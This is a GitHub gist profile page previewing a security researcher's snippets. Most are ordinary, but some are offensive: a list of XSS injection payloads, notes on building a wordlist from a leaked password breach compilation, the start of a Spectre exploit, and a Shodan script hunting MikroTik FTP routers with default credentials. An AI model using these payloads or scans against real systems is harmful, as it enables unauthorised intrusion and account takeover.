Skip to content

Instantly share code, notes, and snippets.

View jimywork's full-sized avatar
🌴
On vacation

Fábio Castro jimywork

🌴
On vacation
  • São Paulo, Brazil
View GitHub Profile
@jimywork
jimywork / 666_lines_of_XSS_vectors.html
Created November 27, 2017 13:27 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@jimywork
jimywork / meta-tags.md
Created November 30, 2017 18:17 — forked from lancejpollard/meta-tags.md
Complete List of HTML Meta Tags

Copied from http://code.lancepollard.com/complete-list-of-html-meta-tags/

Basic HTML Meta Tags

<meta name="keywords" content="your, tags"/>
<meta name="description" content="150 words"/>
<meta name="subject" content="your website's subject">
<meta name="copyright"content="company name">
<meta name="language" content="ES">
@jimywork
jimywork / certstreamcatcher.js
Last active February 14, 2018 12:12
Search for phishing using certstream with regex
/**
* Github
* https://github.com/6IX7ine/certstreamcatcher
*
* Copyright (c) 2017 Fábio Castro
* Licensed under the MIT license.
*/
'use strict'
@jimywork
jimywork / breachcompilation.txt
Created December 19, 2017 15:54
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@jimywork
jimywork / spectre.c
Created January 4, 2018 15:05 — forked from Badel2/spectre.c
Spectre attack example implementation
/* https://spectreattack.com/spectre.pdf */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

Keybase proof

I hereby claim:

  • I am 6IX7ine on github.
  • I am 6ix7ine (https://keybase.io/6ix7ine) on keybase.
  • I have a public key whose fingerprint is 7C76 2060 A938 7FF8 26D9 ADF3 7F64 16B0 A124 0B60

To claim this, I am signing this object:

@jimywork
jimywork / app.js
Last active January 17, 2018 11:55
Simple API for fetching keywords in database with express and mongodb
var util = require('util');
var mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/dexter', { useMongoClient: true });
mongoose.Promise = global.Promise;
var database = require('./models/database.js');
var express = require('express');
var app = express();
Fabio Castro::
import java.util.Arrays;
public class MeuVetor {
private double[] notas = new double[5];
public MeuVetor() {
limpar();
}
@jimywork
jimywork / setup.py
Last active May 16, 2018 14:41
Program dependency configuration file with pip
import pip
import os
import time
def install():
"""Installing as Program Dependencies"""
try:
with open("requirements.txt", "r") as requirements:
import ftplib
import shodan
creds = ('admin', '')
api = shodan.Shodan("TOKEN")
results = api.search('port:"21" country:"BR" product:"MikroTik router ftpd"', page=1, limit=1000, offset=None)
print("[+] Connected Succesfull on Shodan API\n[+] Shodan Search Found: {}\n".format(results["total"]))